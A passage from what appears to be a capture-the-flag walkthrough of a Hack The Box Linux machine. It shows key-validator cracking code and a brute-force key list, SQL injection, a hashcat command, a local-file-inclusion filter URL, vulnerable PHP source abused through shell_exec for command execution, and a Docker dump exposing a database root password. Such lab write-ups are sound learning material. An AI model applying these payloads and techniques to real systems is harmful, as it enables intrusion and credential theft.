          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
